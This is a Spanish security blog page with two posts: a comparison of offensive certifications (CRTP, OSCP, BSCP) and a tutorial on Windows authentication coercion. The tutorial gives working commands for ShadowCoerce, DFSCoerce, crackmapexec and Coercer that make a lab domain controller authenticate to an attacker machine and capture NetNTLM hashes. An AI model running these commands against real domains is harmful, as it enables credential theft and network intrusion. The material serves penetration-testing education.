26 feb 2024

Análisis de Certificaciones de Ciberseguridad Ofensiva | Parte II

 


En la anterior entrega de Certificaciones de Ciberseguridad Ofensiva, estuvimos hablando sobre eJPT (Junior Penetration Tester) y  eWPT (Web Penetration Tester). Durante la entrega de hoy os contaremos qué otras posibilidades existen respecto a las Certificaciones de Ciberseguridad Ofensiva:

CRTP (Certified Red Team Professional)

Descripción

El CRTP (Certified Red Team Professional) de Altered Security es una certificación de Red Team en la que se evalúa la capacidad de una persona para comprometer entornos de Directorio Activo empresariales.

Público objetivo

Esta certificación está diseñada para personas que buscan adquirir los conocimientos necesarios para llevar a cabo ejercicios de Red Team y auditorías internas de seguridad. Sin embargo, también es una excelente opción para aquellos que simplemente deseen ampliar sus conocimientos en comprometer entornos de Directorio Activo empresariales.

Contenido

  • Enumeración de Directorio Activo: enumerar información útil como usuarios, grupos, pertenencia a grupos, equipos, propiedades de usuarios, confianzas, ACL, etc., para mapear rutas de ataque.
  • Escalada de privilegios local: escalar privilegios locales en máquinas Windows del dominio objetivo.
  • Escalada de privilegios de dominio: descubrir credenciales y sesiones de cuentas administradoras, aplicar técnicas clásicas como Kerberoast y sus variantes, identificar y explotar problemas de delegación, así como aprender a abusar de los privilegios de grupos protegidos.
  • Persistencia de dominio: explotar la funcionalidad de Kerberos para persistir con privilegios de administrador de dominio, falsificar tickets para llevar a cabo ataques como "Golden ticket" y "Silver ticket". Subvertir la autenticación a nivel de dominio con técnicas como "Skeleton key" y SSP personalizado.

Formato de examen

El CRTP es un examen de 24 horas que consiste en realizar una auditoría interna en un Directorio Activo desde una máquina Windows y con un usuario de dominio proporcionado. El objetivo del examen es lograr la ejecución de comandos en todas las máquinas, independientemente de si se poseen privilegios de administrador o no. En total, hay 5 máquinas, excluyendo la propia del examinado. Tras realizar la parte práctica, se dispone de 48 horas para enviar el informe.

Precio

Para poder realizar el examen, es necesario adquirir el curso de Altered Security, que ofrece tres opciones diferentes. La opción más asequible tiene un precio de 249$ e incluye 30 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.

La segunda opción tiene un precio de 379$ e incluye 60 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.

La tercera opción tiene un precio de 499$ e incluye 90 días de laboratorio, acceso de por vida al material del curso y un intento de examen.

Existe la posibilidad de adquirir un intento de examen adicional por 99$. Si se desea extender el acceso al laboratorio por 30 días, además de obtener otro intento de examen, es posible hacerlo por 199$.


OSCP (Offensive Security Certified Professional)

Descripción

El OSCP (Offensive Security Certified Professional) es una de las certificaciones más reconocidas en el mundo de la seguridad ofensiva. Es una certificación totalmente práctica con la que se aprenden metodologías de pentesting y el uso de herramientas que vienen incluidas en la distribución Kali Linux.

Público objetivo

Esta certificación no está diseñada para personas que están dando sus primeros pasos en el pentesting, a diferencia de otras como el eJPT. Está dirigida a personas que poseen un conocimiento técnico un poco más avanzado, ya sea a través de experiencia profesional o de haber dedicado tiempo a resolver desafíos en plataformas como TryHackMe o HackTheBox.

Contenido

  • Metodologías de pentesting: comprensión de la metodología de hacking ético y pentesting, incluyendo reconocimiento, enumeración, explotación, post-explotación e informes.
  • Fundamentos de Linux: conocimiento del sistema operativo Linux, interfaz de línea de comandos y sistema de ficheros.
  • Conceptos de Redes: comprensión de protocolos y conceptos de redes, incluyendo TCP/IP, enrutamiento y firewalls.
  • Seguridad de Aplicaciones Web: conocimiento de vulnerabilidades en aplicaciones web, incluyendo SQL injection, cross-site scripting (XSS) e inyección de comandos.
  • Seguridad de Windows: conocimiento de la seguridad del sistema operativo Windows, incluyendo cuentas de usuario, permisos de ficheros y Directorio Activo.
  • Desarrollo de Exploits: conocimiento de técnicas de desarrollo de exploits, incluyendo ingeniería inversa, lenguaje ensamblador y debugging.
  • Seguridad Wireless: comprensión de conceptos y vulnerabilidades en redes wireless.
  • Criptografía: comprensión de conceptos y técnicas criptográficas, incluyendo cifrado, descifrado y hashing.

Formato de examen

El examen se divide en dos partes: la fase de explotación y la elaboración del informe, cada una con una duración de 24 horas. La evaluación total consta de 100 puntos, siendo necesario obtener al menos 70 para aprobar. Los 100 puntos se dividen de la siguiente manera:

  • 60 puntos: 3 máquinas independientes, cada una con una puntuación de 20 puntos. Estos 20 puntos se dividen en 10 por conseguir acceso a la máquina y otros 10 por escalar privilegios y convertirse en administrador/root.
  • 40 puntos: entorno de directorio activo con 2 clientes y un controlador de dominio. Solamente se obtienen los puntos si se compromete el directorio activo al completo, sin posibilidad de obtener puntos parciales. Esto quiere decir que se obtienen 40 puntos o ninguno.

Además, aparte de los puntos que se obtengan en el examen, existe la posibilidad de obtener hasta 10 puntos adicionales si se completa lo siguiente:

  • 30 máquinas del laboratorio de preparación.
  • 80% de los ejercicios de cada categoría.

Precio

Para poder realizar el examen, es necesario adquirir el curso PEN-200 (PWK) de Offensive Security. La opción más barata tiene un precio de 1649$ e incluye 90 días de acceso al laboratorio y un intento de examen.

La suscripción Learn One tiene un precio de 2599$ al año y proporciona acceso al laboratorio por un año, así como dos intentos de examen. 

La suscripción Learn Unlimited tiene un precio de 5499$ al año e incluye todos los cursos de la biblioteca de entrenamiento de OffSec, además de intentos de examen ilimitados.


BSCP (Burp Suite Certified Practitioner)

Descripción

El BSCP (Burp Suite Certified Practitioner) es una certificación creada por los desarrolladores de Burp Suite, que es la herramienta por excelencia del pentesting web. Obtener esta certificación demuestra un conocimiento profundo de vulnerabilidades de aplicaciones web, la mentalidad correcta para explotarlas y, por supuesto, las habilidades necesarias con Burp Suite para llevar a cabo estas acciones.

Público objetivo

Esta certificación tiene un nivel de dificultad alto y está diseñada para personas que quieran dedicarse a pentesting de aplicaciones web de manera profesional. No es necesario poseer anteriormente ninguna certificación de pentesting web para poder adquirir el BSCP, pero es recomendable tener unos conocimientos mínimos sobre el funcionamiento de las aplicaciones web.

Contenido

El contenido de esta certificación son todos los módulos de la academia de PortSwigger:

  • Vulnerabilidades del lado del servidor:
    • Autenticación
    • Path traversal
    • Inyección de comandos
    • Vulnerabilidades de lógica de negocio
    • Revelación de información
    • Control de acceso
    • Vulnerabilidades de subida de ficheros
    • Condiciones de carrera
    • Server-side request forgery (SSRF)
    • Inyección XXE, SQL y NoSQL
    • Testeo de APIs


  • Vulnerabilidades del lado del cliente:
    • Cross-site scripting (XSS)
    • Cross-site request forgery (CSRF)
    • Cross-origin resource sharing (CORS)
    • Clickjacking
    • Vulnerabilidades DOM-based
    • WebSockets

Formato de examen

Se dispone de cuatro horas para vulnerar dos aplicaciones web, cada una compuesta por tres fases. En cada fase, se debe identificar una o más vulnerabilidades que deben ser explotadas para avanzar a la siguiente fase.

En la fase 1, se comienza como un usuario no autenticado con el objetivo de escalar a un usuario de bajos privilegios. Después, en la fase 2, se debe escalar a un usuario administrador, y finalmente, en la fase 3, el objetivo es leer un archivo del sistema.

Precio

Cada intento de examen tiene un coste de 89€. A diferencia de otras certificaciones, el BSCP no requiere comprar en conjunto el examen junto con un curso de formación, ya que la formación oficial es la academia de PortSwigger, la cual es gratuita.

Hay que tener en cuenta que para poder realizar el examen es necesario utilizar Burp Suite Professional, que tiene un precio de 449€.


Javier Martín, Analista de Ciberseguridad en Zerolynx.

19 feb 2024

Coerce | Parte II

 


¡Hola de nuevo a todos! Tal y como prometimos, continuamos con la saga de Coerce y en esta segunda parte seguimos comentando sobre otros RPC vulnerables:

MS-FSRVP

MS-FSRVP Es el Remote Procedure Call relacionado con el protocolo de servidor de archivos remotos VSS. Se utiliza para crear copias de recursos compartidos de archivos en un ordenador remoto y para facilitar a las aplicaciones de copia de seguridad la realización de copias de seguridad coherentes con la aplicación y la restauración de datos en recursos compartidos SMB2.

Cabe destacar que, para poder explotar esta vulnerabilidad, es necesario que el servidor tenga habilitado la característica “Servicio del agente VSS del servidor de archivos”. 



Cabe destacar que Microsoft saco dos parches de seguridad para su corrección el 14 de junio de 2022.

Comprobación

Al igual que en el caso de MS-RPRN, para comprobar utilizamos rpcdump de impacket si el RPC MS-FSRVP se encuentra habilitado:

python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'


Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el RPC denominado como “MS- FSRVP” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como ShadowCoerce la cual tiene asignada el identificador CVE-2022-30154

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

python shadowcoerce.py -d "CORP" -u "bob" -p "<Password>" attack_machine dc.corp.lab


Se puede observar la captura del hash NetNTLM en la herramienta Responder. 


MS-DFSNM


MS-DFSNM es el Remote Procedure Call relacionado con el Sistema de archivos distribuidos (DFS): Protocolo de gestión de espacios de nombres. Proporciona una interfaz RPC para administrar configuraciones DFS. 


Comprobación

Al igual que en el caso de MS-EFSR, haremos uso de la herramienta crackmapexec, a través de la ejecución del módulo “dfscoerce” y mediante el uso usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”, para la comprobación de si el servidor es o no vulnerable, pero esta vez con un usuario del dominio previamente comprometido:

crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "<Password>" -M dfscoerce


Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el controlador de dominio es vulnerable, se procederá a la explotación de del mismo mediante una PoC denominada como DFSCoerce la cual fue publicada en junio de 2022.

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

python3 dfscoerce.py -d "CORP" -u "bob" -p "<password>" attack_machine dc.corp.lab


Se puede observar la captura del hash NetNTLM en la herramienta Responder.



Todos para uno y uno para todos


Coercer es una herramienta escrita en python la cual prueba múltiples métodos de realizar una "Coerce Authentication", además de incluir todos los descritos anteriormente.

Tiene tres modos de ejecución, scan, coerce y fuzz.  Un ejemplo de ejecución en modo scan sería el siguiente:

coercer scan -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"


Un ejemplo de ejecución en modo coerce sería el siguiente:

coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"


Cheat Sheet